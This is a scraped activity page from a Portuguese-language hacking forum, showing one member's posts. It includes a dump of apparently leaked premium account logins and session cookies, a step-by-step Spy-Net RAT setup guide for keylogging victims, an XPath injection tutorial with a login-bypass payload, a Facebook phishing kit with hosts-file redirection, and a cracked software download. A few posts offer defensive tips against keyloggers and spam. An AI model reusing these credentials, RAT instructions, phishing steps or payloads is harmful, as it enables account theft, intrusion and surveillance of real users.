antiblock
Rodnia | Alpha & Omega

V¡®u§

Membro Plus
  • Content Count

    1,215
  • Joined

  • Last visited

  • Days Won

    34

Reputation Activity

  1. Downvote
    V¡®u§ got a reaction from ℳი૨Ֆ in Contas Premium Disponivel [02/12/2012]   
    Gbmeister Premium Account 02.12.2012
    USER: davidbaldwin
    PASS: premium-login.com

    Filedownloads.org Premium Account 02 december 2012
    USER: premiumlogincom
    PASS: premium-login.com



    Ryushare Premium account 02.12.2012
    USER: prijon
    PASS: MollaborjaN.Com


    EASYBYTEZ Premium Account 02 december 2012
    USER: luca1977
    PASS: PreGen.tk



    Filemates Premium Account 02 december 2012
    USER: garage
    PASS: garage1

    Uploadhero.com Premium Account 02 december 2012
    USER: thx1138
    PASS: thx1138




    Fileget.com Premium Account 02 december 2012
    USER: testtest
    PASS: testtest

    Share-online Premium Account 02 december 2012
    USER: PreGen.tk_15
    PASS: PreGen.tk



    Turbobit Premium Account 02.12.2012
    USER: [email protected]
    PASS: 4863are


    Sharpfile Premium Account 01.12.2012
    USER: xpand68
    PASS: xpand68

    Hipfile Premium Account 02.12.2012
    USER: 8136375
    PASS: lfilmi


    Hipfile Premium Account 02.12.2012
    USER: 8136375
    PASS: lfilmi


    Uploading Account 02.12.2012
    USER: [email protected]
    PASS: tiny3260


    saarie.com Premium Account 02.12.2012
    User : superlogin
    Pass : premium-login.com


    filemonster Premium Account 02.12.2012
    User : diego19dar
    Pass : diegoman


    Fileopic.com Premium Account 02.12.2012
    User : fara-movie
    Pass : faramovie3.org


    Rapidgator Premium cookies 02.12.2012
    1.0%2FeyJpZCI6IjEwODQ3NjIiLCJuYW1lIjoiICIsImVtYWlsIjoicGVydW5hNzNAeWFob28uY29tIiwiYXV0aEZyb20iOiJmcm9udGVuZCJ9%2F1354004382%2Fe5e1de402ad02e10649e47797f812ac593106d2e

    1.0%2FeyJpZCI6IjEwODQ3NjIiLCJuYW1lIjoiICIsImVtYWlsIjoicGVydW5hNzNAeWFob28uY29tIiwiYXV0aEZyb20iOiJmcm9udGVuZCJ9%2F1354035899%2F4fc85a5481bfbb6c82e9db3f04cef8f5c8324514



    Filevelocity Premium Account 02.12.2012
    USER: furbound017
    PASS: PreGen.tk



    Netflix.com Premium Account 12/02/2012
    User : [email protected]
    Pass : casey1
    User : bobjoe
    Pass : bobjoe

    gamersgate.com Premium Account 02.12.2012
    User: kalisto75
    Pass : pingouin


    GiGABase.com Premium Account 02.12.2012
    User : 79229224143
    Pass : 8hxYmNzu

    Unibytes Premium Accounts 02 november 2012
    user : 79643879612
    pass : qwerty
    user : 79816809854
    pass: 8507

    Firstload Premium Account 02.12.2012
    user : fst3051465
    pass : v8f1auru


    HuluPlus Premium Accounts 02.12.2012
    [email protected]:tugnutt [email protected]:GALTNET2 [email protected]:stormy01 okeefesf:cobra577
    tmacht:23902390
    nealsworld:69beetle
  2. Upvote
    V¡®u§ got a reaction from ⓢⓚⓤⓟⓔ in Apostila Completa Sobre C/C++ Em Português   
    A linguagem C tornou-se uma das linguagens de programação mais usadas. Flexível, ainda que poderosa, a linguagem C tem sido utilizada na criação de alguns dos mais importantes produtos de software dos últimos anos. O C ou o C++ tem possibilidades quase que infinitas...

    http://bu0l7o.1fichier.com/
    http://www.4shared.c...ber-Gamers.html
    http://depositfiles....files/7vrwkvn6e
    http://www.digzip.co...IMMOO/linguagem c -Cyber-Gamers.html
    http://www.mediafire...duutudaacm5wg8k
    http://www.mirrorcre...amers.rar_links
    http://rapidshare.co...yber-Gamers.rar
    http://www.sendspace.com/file/28q5t7
    http://ul.to/lwuccxi1
    http://www.ziddu.com...Gamers.rar.html
    http://www10.zippysh...02698/file.html
    http://bayfiles.com/...yber-Gamers.rar


    https://www.virustot...sis/1344033701/
  3. Upvote
    V¡®u§ got a reaction from p0w3r0ff in Hack Senhas de Paypal, Facebook, Hotmail Usando Spy-Net   
    Como todos sabemos, na Cyber-Gamers temos discutido método de hacking vários hackear senha de conta de e-mail. Neste topico, eu vou postar a maneira mais útil sobre como hackear senha de conta de e-mail. Este software de invasão usadas para hackear senha de conta de e-mail é Spy-Net RAT. RAT, como todos sabemos, é uma ferramenta de administração remota, usado para hack computador remotamente. Spy-Net RAT é muito eficiente e simples de usar para hack paypal, hotmail senhas de conta de e-mail.

    Basicamente RAT também é um atalho chamado ferramenta Remote Administrator. é usado principalmente para fins maliciosos, como o controle do PC, roubar dados das vítimas, excluir ou editar alguns arquivos. Você só pode infectar alguém, enviando-lhe arquivo chamado servidor e eles precisam clicar nele. Hoje, neste topico eu estou indo para compartilhar um trojan para hack e roubar informações da vítima.

    Siga as instruções dadas abaixo para configurar Spy-Net RAT ...

    Passo 1: Download Spy-Net RAT para hackear computador ou senha da conta de e-mail.
    http://www.badongo.com/file/26697837
    http://www.filejungle.com/f/YX8BRv
    Password: Cyber-Gamers
    Passo 2: Agora, vá para No-ip.com e registrar uma conta. Adicionar um host, baixar No-ip do cliente e conectar ao seu host.

    Update:

    Você pode consultar Como configurar o No-IP do host para obter mais informações sobre como configurar o No-ip host.
    Ok então agora é hora de configurar Spy-Net!

    Passo 3: Agora descompacte Spt-Net [RAT] v2.6 Cyber-Gamers e, em seguida, executar o Spy-Net.exe, você receberá um popup com uma linguagem estranha, clique em NO.

    Em Spy Net, clique em Iniciar e, em seguida, Opces -> Idioma -> English.ini (isso é para alterar o idioma do SpyNet, o padrão é espanhol ou algo assim)

    Ok agora, eu enviei as fotos para que seja mais fácil.

    Passo 4: Agora vá em File -> Servidor Criar -> Selecione qualquer um dos perfis

    Passo 5: Agora vá para a guia conexão, onde ela diz "Your_Dns_here" Clique uma vez sobre ela e clique em Excluir. Em seguida, clique em Adicionar e escreva o seu endereço no-ip, e clique em Adicionar ou OK eu não sabia o que era

    Passo 6: Agora vá para a guia de instalação, e deixar tudo como está ... (Estas opções os eu uso pessoalmente)

    Passo 7: Agora vá para a guia Keylogger ...

    Ok, então eu acho que todo mundo quer o keylogger, para selecioná-lo.
    E eu prefiro usar a opção Backspace também, como se alguém logins para o Facebook, e seu e-mail é [email protected], e ele um erro de digitação e mostrou como [email protected], certeza que ele vai usar backspace e corrigi-lo, por isso este será gravado em seu keylogger e você pode obter as senhas mais fácil :)

    Passo 8: Agora vá para Anti-Debug ..

    Selecione todos eles, se você quiser testá-lo em Sandboxie, desmarque o primeiro :)

    Passo 9: Finalmente vá para Criar Servidor .. Não escolhemos o que quiser, para alterar o ícone, clique no ícone Imagem lá e selecione qualquer exe ou ico e clique no botão Criar Server para criar arquivos do servidor...

    Você agora configurar o servidor para Spy-Net RAT, agora apenas espalhar e se divertir com os escravos agora.

    Então, espero que este Spy-Net RAT tutorial de sobre como hack computador ou senha de contas de e-mail sejá útil para você.
    Lembrando que os conteúdos postados são apenas para fins educacionais, com apenas o intuito de ensinar como funciona e de como se proteger de possíveis ataques ou invasões. Cyber gamers não aconselha não orienta e nem incentiva seus usuários a fazerem invasões de nenhuma espécie e que todas as informações discutidas NO FORUM são somente a nível de conhecimento MEU CONHECIMENTO NAO é CRIME MAS SEUS ACTOS PODEM SER!
  4. Upvote
    V¡®u§ got a reaction from san95 in Net Tools 5.0 (build 70)   
    Net Tools é de ponta de segurança e software de monitoramento de rede para a Internet e Redes Locais, fornecendo clientes com a capacidade e confiança para enfrentar os desafios da tecnologia de amanhã. Acompanhando as tendências da indústria, nós oferecemos ferramentas profissionais que suportam os mais recentes padrões, protocolos, software e hardware para redes com e sem fio. O objetivo principal é a criação de software de alta qualidade. Net Tools é uma combinação muito forte de digitalização em rede, segurança, arquivo, sistema e ferramentas do administrador úteis em diagnosticar redes e monitorar o seu PC e as conexões de rede do computador para administradores de sistema. Próximo aos principais ferramentas essenciais que inclui uma série de funcionalidades extras valiosos. é um canivete suíço para todos os interessados ​​em um conjunto de ferramentas de rede poderosos para o uso diário. Este conjunto de ferramentas tudo-em-um inclui também um monte de arquivo acessível e utilitários do sistema ao lado da enorme quantidade de ferramentas de rede. Os menus são totalmente configuráveis​​, assim, desta forma você não vai se perder na quantidade extremamente grande de ferramentas essenciais. Todas as características adicionais fazem desta aplicação um deve ter para todos os administradores de sistema. Existem numerosas aplicações construtivas e valioso incluído nas ferramentas de líquidos que podem ser utilizados para uma grande quantidade de efeitos. A última versão do Net Tools é híbrido, isso significa que ele é capaz de trabalhar em conjunto com as aplicações que são feitas e projetado para Net Tools, assim, desta forma mais flexibilidade e facilidade de uso é obtido. Este software é projetado para o sistema operacional Microsoft Windows (Windows 98, NT, 2000, 2003, XP, Vista, 7). é totalmente compatível e tem sido exaustivamente testado no Windows XP. Com as ferramentas 175 + é uma grande coleção de ferramentas úteis para os usuários da rede. O tamanho da Net Tools 5.0.70 é de aproximadamente 25 MB.

    Conteúdo

    Net Tools 5.0 (build 70) contém uma grande variedade de ferramentas de rede. Aqui está uma lista das ferramentas mais importantes:
    1) IP Address Scanner
    2) IP Calculator
    3) IP Converter
    4) Port Listener
    5) Port Scanner
    6) Ping
    7) NetStat (2 ways)
    8) Trace Route (2 ways)
    9) TCP/IP Configuration
    10) Online - Offline Checker
    11) Resolve Host & IP
    12) Time Sync
    13) Whois & MX Lookup
    14) Connect0r
    15) Connection Analysator and protector
    16) Net Sender
    17) E-mail seeker
    18) Net Pager
    19) Active and Passive port scanner
    20) Spoofer
    21) Hack Trapper
    22) HTTP flooder (DoS)
    23) Mass Website Visiter
    24) Advanced Port Scanner
    25) Trojan Hunter (Multi IP)
    26) Port Connecter Tool
    27) Advanced Spoofer
    28) Advanced Anonymous E-mailer
    29) Simple Anonymous E-mailer
    30) Anonymous E-mailer with Attachment Support
    31) Mass E-mailer
    32) E-mail Bomber
    33) E-mail Spoofer
    34) Simple Port Scanner (fast)
    35) Advanced Netstat Monitoring
    36) X Pinger
    37) Web Page Scanner
    38) Fast Port Scanner
    39) Deep Port Scanner
    40) Fastest Host Scanner (UDP)
    41) Get Header
    42) Open Port Scanner
    43) Multi Port Scanner
    44) HTTP scanner (Open port 80 subnet scanner)
    45) Multi Ping for Cisco Routers
    46) TCP Packet Sniffer
    47) UDP flooder
    48) Resolve and Ping
    49) Multi IP ping
    50) File Dependency Sniffer
    51) EXE-joiner (bind 2 files)
    52) Encrypter
    53) Advanced Encryption
    54) File Difference Engine
    55) File Comparasion
    56) Mass File Renamer
    57) Add Bytes to EXE
    58) Variable Encryption
    59) Simple File Encryption
    60) ASCII to Binary (and Binary to ASCII)
    61) Enigma
    62) Password Unmasker
    63) Credit Card Number Validate and Generate
    64) Create Local HTTP Server
    65) eXtreme UDP Flooder
    66) Web Server Scanner
    67) Force Reboot
    68) Webpage Info Seeker
    69) Bouncer
    70) Advanced Packet Sniffer
    71) IRC server creater
    72) Connection Tester
    73) Fake Mail Sender
    74) Bandwidth Monitor
    75) Remote Desktop Protocol Scanner
    76) MX Query
    77) Messenger Packet Sniffer
    78) API Spy
    79) DHCP Restart
    80) File Merger
    81) E-mail Extractor (crawler / harvester bot)
    82) Open FTP Scanner
    83) Advanced System Locker
    84) Advanced System Information
    85) CPU Monitor
    86) Windows Startup Manager
    87) Process Checker
    88) IP String Collecter
    89) Mass Auto-Emailer (Database mailer; Spammer)
    90) Central Server (Base Server; Echo Server; Time Server; Telnet Server; HTTP Server; FTP Server)
    91) Fishing Port Scanner (with named ports)
    92) Mouse Record / Play Automation (Macro Tool)
    93) Internet / LAN Messenger Chat (Server + Client)
    94) Timer Shutdown/Restart/Log Off/Hibernate/Suspend/ Control
    95) Hash MD5 Checker
    96) Port Connect - Listen tool
    97) Internet MAC Address Scanner (Multiple IP)
    98) Connection Manager / Monitor
    99) Direct Peer Connecter (Send/Receive files + chat)
    100) Force Application Termination (against Viruses and Spyware)
    101) Easy and Fast Screenshot Maker (also Web Hex Color Picker)
    102) COM Detect and Test
    103) Create Virtual Drives
    104) URL Encoder
    105) WEP/WPA Key Generator
    106) Sniffer.NET
    107) File Shredder
    108) Local Access Enumerater
    109) Steganographer (Art of hiding secret data in pictures)
    110) Subnet Calculater
    111) Domain to IP (DNS)
    112) Get SNMP Variables
    113) Internet Explorer Password Revealer
    114) Advanced Multi Port Scanner
    115) Port Identification List (+port scanner)
    116) Get Quick Net Info
    117) Get Remote MAC Address
    118) Share Add
    119) Net Wanderer
    120) WhoIs Console
    121) Cookies Analyser
    122) Hide Secret Data In Files
    123) Packet Generator
    124) Secure File Splitting
    125) My File Protection (Password Protect Files, File Injections)
    126) Dynamic Switch Port Mapper
    127) Internet Logger (Log URL)
    128) Get Whois Servers
    129) File Split&Merge
    130) Hide Drive
    131) Extract E-mails from Documents
    132) Net Tools Mini (Client/Server, Scan, ICMP, Net Statistics, Interactive, Raw Packets, DNS, Whois, ARP, Computer's IP, Wake On LAN)
    133) Hook Spy
    134) Software Uninstaller
    135) Tweak & Clean XP
    136) Steganographic Random Byte Encryption
    137) NetTools Notepad (encrypt your sensitive data)
    138) File Encrypter/Decrypter
    139) Quick Proxy Server
    140) Connection Redirector (HTTP, IRC, ... All protocols supported)
    141) Local E-mail Extractor
    142) Recursive E-mail Extractor
    143) Outlook Express E-mail Extractor
    144) Telnet Client
    145) Fast Ip Catcher
    146) Monitor Host IP
    147) FreeMAC (MAC Address Editor)
    148) QuickFTP Server (+user accounts support)
    149) NetTools Macro Recorder/Player (Keybord and Mouse Hook)
    150) Network Protocol Analyzer
    151) Steganographic Tools (Picture, Sounds, ZIP Compression and Misc Methods)
    152) WebMirror (Website Ripper)
    153) GeoLocate IP
    154) Google PageRank Calculator
    155) Google Link Crawler (Web Result Grabber)
    156) Network Adapter Binder
    157) Remote LAN PC Lister
    158) Fast Sinusoidal Encryption
    159) Software Scanner
    160) Fast FTP Client
    161) Network Traffic Analysis
    162) Network Traffic Visualiser
    163) Internet Protocol Scanner
    164) Net Meter (Bandwidth Traffic Meter)
    165) Net Configuration Switcher
    166) Advanced System Hardware Info
    167) Live System Information
    168) Network Profiler
    169) Network Browser
    170) Quick Website Maker and Web Gallery Creator
    171) Remote PC Shutdown
    172) Serial Port Terminal
    173) Standard Encryptor
    174) Tray Minimizer
    175) Extra Tools (nmap console & win32 version)
    Muitos recursos extras e utilitários estão incluídos neste pacote!

    Download:
    http://www.mabsoft.com/NetTools5.0.70.zip
  5. Upvote
    V¡®u§ got a reaction from san95 in O que fazer quando você é atingido por um spam no Facebook   
    Oi todos os usuários, como você sabe que esses dias duas coisas estão se espalhando muito facil no facebook:

    Primeiro é o spam que contenha conteúdo impróprio, como "é acontecem na televisão ao vivo" ou "as pessoas 99% não pode assistir o vídeo por mais de 15 segundos", que é muito constrangedor eu não quero colocar a imagem aqui, e segundo São as pessoas estão compartilhando fotos depois de serem atingidas pelo spam e colocando toda a culpa sobre hackers.

    Recentemente percebi uma coisa estranha acontecendo com minha conta. Eu tentei apagar o spam, mas ele começou a se espalhar através do meu perfil mesmo que eu não clique no link spam. Assim é difícil dizer porque isso está acontecendo, mas o problema dele mudou a minha atenção de volta para os códigos de spam, onde encontrou um script enterrado que estava fazendo uma diversão tranquila com os cookies. Mais hoje trouxe a minha atenção para esse script. De qualquer forma eu não quero este tutorial complicado para itender então eu vou te dizer em linguagem simples.(Até eu msm so meio lerdo rsrs)

    Vamos falar sobre as coisas que você pode fazer para se livrar completamente do spam no caso de você acidentalmente (ou intencionalmente) clicado ele. Então, se você é uma vítima, em seguida, siga os passos da partida.

    1. Relatório como spam

    Este é o primeiro passo de precaução que você precisa tomar. imediatamente relatório de spam para o facebook da equipe (não clique em delete). Relatórios como spam automaticamente oculta o link do seu feed para não correr o risco de excluí-lo.

    2. Desabilitar o plug-in instalado

    O spam recentes lhe pede para instalar um plugin em falta. Portanto, caso você o tenha instalado, Seja rápido para removê-lo. Se você estiver usando o firefox vá para Firefox> Add-ons> Extensions. Aqui você vai encontrar o plugin malicioso. Clique em Remover para se livrar dele.
    Para os usuários do Chrome, clique no pequeno Wrench (Rinch) ícone no canto direito do navegador, em seguida, clique em opções e mudar para extensões. Desabilitar e remover o plugin de lá.

    3. Mudar para Https

    Swithching para https é o passo mais importante para estar seguro online para que, imediatamente mudar para https versão do facebook, se você ainda não o fizeram. Isso irá evitar qualquer tipo de roubo de sessão e evitar os cookies http criado pelo spam em seu sistema para re-postar o link no perfil.

    4. Limpar Cookies histórico de Navegação e cache do navegador

    O spam cria lotes de falso cookies facebook http em seu sistema que pode re-post os links de spam no seu perfil e pode redirecioná-lo para outros links também. Por isso, é altamente recomendado que você exclua todos os cookies do navegador. Limpar o histórico do navegador também pode ajudar em alguns casos, onde você pode novamente acidentalmente cliquecando no link. Para ir firefox Firefox> Ferramentas> Opções> Remover os cookies individuais> Remova todos os cookies.

    5. Use KeyScrambler

    Eu recomendo que você use KeyScrambler a fim de evitar ser hacked sua senha porque é uma ferramenta muito poderosa que criptografa sua digitação no kernel e descriptografa-lo no aplicativo de destino, deixando keyloggers com chaves indecifráveis ​​para gravar.

    Sua conta do Facebook é preciosa, pois tem muitas coisas que pertence pessoalmente a você (desnecessário dizer), então por que correr o risco, assim que o hábito de alterar a senha regularmente. Ela impede que seja hacked ou uso indevido de sua conta com grandes riscos de ameaças de segurança, como muitos RAT keylogger,Phising etc...
  6. Upvote
    V¡®u§ got a reaction from Night_Guerreiro in Como postar uma foto no seu Facebook Chat-Box?   
    1. Entrar em sua conta no Facebook.(Se não confia faça teste em uma conta fake)

    2. Agora siga este link. : http://smileyti.me/
    3. Como sua página (Opcional).

    4. Você vai ter uma opção de upload.

    5. Carregar uma foto, preencher o captcha em seguida, pressione o botão de upload agora.

    6. Há um outro link "show code" clique sobre.

    7. Não é o seu código de imagem.

    8. Copie esse e colá-los na sua caixa de bate-papo e pressione enter.

    Agora você está pronto.
  7. Upvote
    V¡®u§ got a reaction from Strimblaster in Como proteger seu PC de keyloggers   
    O que é Keylogger?
    Keylogger é basicamente uma ferramenta de software que clones seus traços essenciais pressionado e grava-os em arquivos de log. Alguns keyloggers inteligentes ou simplesmente dizer avançados recupera as senhas salvas em navegadores e outros aplicativos Windows. Hackers usam keyloggers para hackear senhas de usuários de e-mail de contas e senhas de outros e controlar a sua actividade quotidiana.

    Como o Keylogger funciona?
    Deixa explicar isso de maneira muito simples, sempre que você pressione qualquer tecla de seu teclado ou laptop sua máquina gera um código de chave simples, que depende do formato de teclado que você está usando. Esse código chave informe o seu sistema operacional que você pressionou uma tecla específica. Agora, o keylogger é que salvar o seu curso chave em um arquivo. Agora processamento adicional depende de tipo de Keyloggers. Basicamente, existem dois tipos de keyloggers:
    1. Keylogger Física
    2. Keylogger Remoto

    O processamento acima é o mesmo para keyloggers físicos e remoto. A diferença está em como eles vão usar um arquivo de log.
    Keyloggers físicos requer acesso físico ao sistema da vítima, para que hacker pode instalá-lo manualmente. Ele pode ser seu amigo, irmão, irmã ou alguém próximo que realmente tem acesso físico ao seu PC ou laptop. Agora, para obter registros também ele tem que acessar manualmente o seu PC para verificar logs. Mas hoje em dia poucos bons keyloggers físicos estão lá, que envia os logs no endereço de e-mail. Então, hoje nós só precisamos de um tempo de acesso físico e isso é só para instalar Keylogger e configurar um endereço de e-mail para enviar logs.

    Keyloggers remotos são um pouco diferentes, pois há nome sugere que pode ser instalado a partir remoto, significa que você não precisa de nenhum acesso físico. Keyloggers remoto durante a configuração gera um servidor que pode enviar à vítima e que não necessita de qualquer instalação. Keylogger remoto mantém os registros em arquivos de log e quando a vítima se conecta a Internet, enviar os logs para o endereço de e-mail hacker ou conta de FTP que ele putted durante o tempo de configuração para receber os logs.

    SOLUçãO PARA KEYLOGGERS:
    Como todos sabemos keyloggers novos são sempre FUD (totalmente indetectável) para o nosso antivírus não mostra quaisquer mensagens de aviso, enquanto a infecção. Então, o melhor método para se proteger de keyloggers é que encriptar seus traços essenciais, usando misturadores-chave. O que um keylogger faz é que ele monitora teclas, então quando nós transferimos nossos traços essenciais, Hacker ainda vai receber os logs, mas que lixo como as nossas chaves são criptografadas e, portanto, ele não recebe nada e vítima permanecerá seguro de seu keylogger.

    Vamos entendê-la com o exemplo. Suponha que você digitou

    Cyber-Gamers

    O scrambler chave vai fazer? Ele irá criptografar sua chave cada pressionada em algum código de lixo e keylogger vai ter isso como algo como:

    sT @ AD9; 8in = P

    Então amigos o que fez scrambler é que ele tem criptografados suas teclas e te salvou de cair em kl de hackers. Seguro e se proteger de keyloggers como você não pode evitá-los o que você pode apenas fazer é enganá-los, criptografando suas teclas.
    Download:
    Badongo - DepositFile - Fileserve - Mediafire - Rapidshare - Sendspace -
  8. Upvote
    V¡®u§ got a reaction from alamin in Invadir sites usando XPath Injection   
    Muitos site todos os dias são invadidos por hackers, mas a maioria dos hackers , hack site só para ganhar mais popularidade. Hoje eu estou escrevendo este tutorial sobre Injeção XPath, em que eu vou explicar, Como Hackear sitecom Injection Usando XPath.

    Em uma arquitetura típica de aplicativos da Web, todos os dados são armazenados em um servidor de banco de dados. Este banco de dados de dados servidor de armazenamento em vários formatos como um banco de dados LDAP, XML ou RDBMS. O aplicativo consulta o servidor e acessa as informações com base na entrada do usuário.

    Normalmente atacantes tentar extrair mais informações do que o permitido pela manipulação ou usando a consulta com inputs.E especialmente criado, neste tutorial vamos estar discutindo técnicas de injeção XPATH para extrair dados de bancos de dados XML.
    Tutorial XPath Injection Para Hack Websites Banco de Dados

    Antes de ir mais fundo na injeção de XPATH vamos dar uma breve olhada em o que o XML e XPath.

    O que é XML?
    XML significa Extensible Markup Language e foi concebido ou utilizado para descrever dados. é fornecer a plataforma para os programadores a criar as suas próprias marcas personalizadas para armazenar dados no servidor de banco de dados. Um documento XML é mais semelhante a um banco de dados RDBMS, exceto pela maneira como os dados são armazenados neles. No caso de um banco de dados normal, os dados são armazenados em uma tabela linhas e colunas e em XML os dados são armazenados em nós em forma de árvore.

    O que é XPath?
    XPath é uma linguagem de consulta usada para selecionar os dados a partir de fontes de dados XML. é cada vez mais comum para aplicações web para usar arquivos de dados XML no back-end, usando XPath para realizar consultas SQL muito o mesmo modo seria usado contra um banco de dados relacional.
    XPath injeção, bem como injeção de SQL, existe quando um usuário malicioso pode inserir o código XPath arbitrária nos campos de formulário e parâmetros URL de consulta, a fim de injetar este código diretamente no mecanismo de avaliação de consulta XPath. Fazer isso seria permitir que um usuário malicioso para ignorar a autenticação (se um sistema de autenticação baseado em XML é usado) ou para acessar dados restritos da fonte de dados XML.

    Permite aprender com a ajuda de exemplos que mostram como obras em XPath, Vamos supor que nosso banco de dados é representado pelo seguinte arquivo XML:
    <?xml version="1.0" encoding="ISO-8859-1"?>
    <users>
    <user>
    <username>cyber-gamers</username>
    <password>123</password>
    <account>admin</account>
    </user>
    <user>
    <username>cutler</username>
    <password>jay</password>
    <account>guest</account>
    </user>
    <user>
    <username>ronie</username>
    <password>coleman</password>
    <account>guest</account>
    </user>
    </users>




    O show código acima como detalhes de contas de usuário, senha e do usuário armazenadas no arquivo XML.

    Após consulta XPath é usado para retorna a conta cujo nome é "cyber-gamers" ea senha é "123":,
    string(//user[username/text()=gandalf' and password/text()='!c3]/account/text())




    Se o desenvolvedor do aplicativo não entrada do usuário adequadamente filtro, o testador ou hacker será facilmente capaz de injetar código XPath e interferir com o resultado da consulta. Por exemplo, o hacker ou testador poderia introduzir os seguintes valores:
    Username: ' or '1' = '1
    Password: ' or '1' = '1




    Usando esses parâmetros acima, a consulta torna-se:
    string(//user[username/text()=' or '1' = '1' and password/text()='' or '1' = '1]/account/text())




    Como na maioria dos ataques comuns de injeção de SQL, criamos uma consulta que sempre é avaliada como verdadeira, o que significa que o aplicativo irá autenticar o usuário, mesmo que um nome de usuário ou senha não foram fornecidos.

    E, como em um ataque comum de SQL Injection, com XPath injeção, o primeiro passo é inserir um apóstrofo (') no campo a ser testado, introduzindo um erro de sintaxe na consulta, e para verificar se o aplicativo retorna uma mensagem de erro .

    Se não há conhecimento sobre os detalhes XML de dados internos e se o aplicativo não fornece mensagens de erro úteis que nos ajudam a reconstituir a sua lógica interna, é possível executar um ataque de injeção de Blind
    XPath (eu vou explicar isso outro dia), cujo objetivo é reconstruir a estrutura de dados inteiro. A técnica é semelhante à SQL Injection inferência baseada, como a abordagem é injetar código que cria uma consulta que retorna um bit de informação.
    Então é isso Bye....
  9. Upvote
    V¡®u§ got a reaction from Night_Guerreiro in Como Ocultar Seu Endereço Ip - Real Hide Ip V4.1.8.8   
    Esconder IP real v4.1.8.8
    Anonymous Surfing Hide IP com o Real
    Proteja a sua privacidade na Internet. Com Hide IP real, você pode esconder o seu endereço IP real, navegar anonimamente, enviar e-mails anônimos, através de qualquer sistema de email baseado na Web, un-proibição você mesmo dos fóruns ou sites restritos, mantendo suas informações pessoais a salvo de hackers e ladrões de identidade.

    Hide IP real permite-lhe ser atribuído um dos nossos falsos endereços IP que podem ser de diferentes países, como Estados Unidos, Reino Unido, França, etc Ele funciona com Internet Explorer, Firefox, Opera, Maxthon, MyIE e é compatível com todos tipos de roteadores, firewalls, redes domésticas, redes sem fio e qualquer outro tipo de Internet.

    Como Funciona?

    Por Hide My IP
    Ao se conectar à Internet, o computador (ou roteador de rede) é atribuído um endereço IP público. Como você visitar sites, que o endereço IP é transmitida e gravada em arquivos de log mantidos nesses servidores. Logs de acesso deixar para trás um rastro de suas atividades na Internet. é absolutamente necessário para esconder seu endereço IP real, se você não quer ser rastreada por outras pessoas.

    Como Hide My IP
    Com apenas um clique, Hide IP real permite-lhe manter o seu endereço IP real escondido, surfar anonimamente, proteger todos os protocolos no seu PC, proporcionam criptografia completa de sua atividade, enquanto trabalhava na Internet, e muito mais.

    Principais Características
    * Esconda seu endereço IP real
    Ser atribuídos endereços IP falsos de diferentes países para ocultar o seu IP real.

    * Anonymous Web Surfing
    Surfe anonimamente com IP falso, sempre que você quiser.

    * Proteja sua identidade contra Hackers
    Protegê-lo de hackers e ladrões de identidade que será enganado pelo seu IP falso.

    * Un-proibição você mesmo dos fóruns ou sites restritos
    Hide IP Real permite que você acesse todos os fóruns, blogs ou sites que já proibiu você.

    * Evite sites de acompanhamento de suas atividades on-line
    Esconda seu IP real quando você estiver navegando na Internet para impedir que você está sendo seguido por websites.

    * Sistemas Operacionais
    Windows 2000, Windows XP, Windows Vista, Windows 7 (32 bits e 64 bits)

    Notas de instalação
    1. Instale o programa e não executar.
    2. Copie o crack "RealHideIP.exe" para prog dir, ou seja, "C: \ Arquivos de programas \ RealHideIP \", e substituir o original.
    3. FEITO!
    DOWNLOAD
    http://depositfiles.com/files/c03tzp1pt
    http://www.digzip.com/files/TTPPWGEV/Real Hide IP 4.1.8.8 - By Skynet-Hacker.html
    http://www.mirrorcreator.com/files/1QWCMWUZ/Real_Hide_IP_4.1.8.8_-_By_Skynet-Hacker_3.rar_links
    http://www.mediafire.com/?sa7j725684flpha
    http://www.sendspace.com/file/dekwzo
    http://rapidshare.com/files/4129935677/Real%20Hide%20IP%204.1.8.8%20-%20By%20Skynet-Hacker.rar
    http://www.ziddu.com/download/19856824/RealHideIP4.1.8.8-BySkynet-Hacker.rar.html
    http://ul.to/5h94zpoj
    http://www24.zippyshare.com/v/11311641/file.html
  10. Upvote
    V¡®u§ got a reaction from Night_Guerreiro in Como Hackear conta de Facebook [ATUALIZADO]   
    Nota: Esta é apenas para fins educacionais.
    Requisitos:
    1. FacebookPhisher atualizado.

    http://epamtf.1fichier.com/
    http://www.4shared.c...ber-Gamers.html
    http://www.badongo.com/file/27827648
    http://depositfiles....files/iv7z9wovs
    http://www.digzip.co...ber-Gamers.html
    http://bayfiles.com/...yber-Gamers.rar
    http://www.mirrorcre...amers.rar_links
    http://www.mediafire...ez8n7djhbd11bsq
    http://rapidshare.co...yber-Gamers.rar
    http://www.sendspace.com/file/znhhk5
    http://ul.to/sv7lje65
    http://www.ziddu.com...Gamers.rar.html
    http://www10.zippysh...53839/file.html
    2. Free Web servidor de hospedagem para carregar as páginas Phish.
    3. URL Spoofing utilizando o Host técnica de mapeamento de nome.

    Vou ensinar a vocês hoje. Sei que a maioria de vocês já sabem de phishing, mas para iniciantes, deixe-me explicar um pouco. Páginas Phish significa páginas falsas(fake) que se parece absolutamente semelhante às páginas originais ea técnica de usar essas páginas falsas para hack usuário e senha é chamada de phishing. E a técnica que usamos para enviar essas páginas falsas de vítima e levá-lo a acreditar que eles são reais é chamado de Engenharia Social. Mas eu acho que isso nós já sabemos, o que há de novo que vamos discutir hoje.
    O que a de novo??

    Nós todos sabemos que páginas falsas só pode ser detectada usando duas técnicas:
    1. Verificando a URL na barra de endereços, se a sua página falsa então URL deve ser diferente do original.
    2. O uso de qualquer barra de ferramentas de segurança web que avisa os usuários para páginas falsas, como AVG barra de ferramentas, barra de ferramentas Norton Online etc segurança.
    Mas e se você abrir www.facebook.com manualmente no seu navegador web e abre a página falsa e URL no navegador permanece www.facebook.com. Isso significa primeira técnica para detectar a página falsa. Agora, para segunda técnica, todas as ferramentas de segurança online web detectar páginas falsas, comparando a entrada pelo usuário na barra de endereço URL da URL da página original. Se os dois, em seguida, a sua não uma página falsa mais a sua página de um malware.

    Passos para hackear conta no Facebook ou Senha:

    1. Download Phisher Facebook.
    2. Extraia os arquivos, você vera esses 4 arquivos abaixo:

    index.php
    facebook1.php
    senha.html
    Obrigado.php

    3. Agora vá para qualquer servidor gratuito web hosting para fazer upload destas páginas falsas.
    Observe tudo deve ser carregado na raiz não significa em qualquer pasta. Apenas no diretório de primeiro nível.

    4. Agora você precisa encontrar o endereço IP correto da conta que você criou no servidor de hospedagem.

    5. Quando você começa o seu endereço IP página falsa, agora o que precisamos fazer é que temos de adicionar a entrada do endereço IP contra o www.facebook.com no arquivo vítima host localizado abaixo do local.
    C:WindowsSystem32driversetc
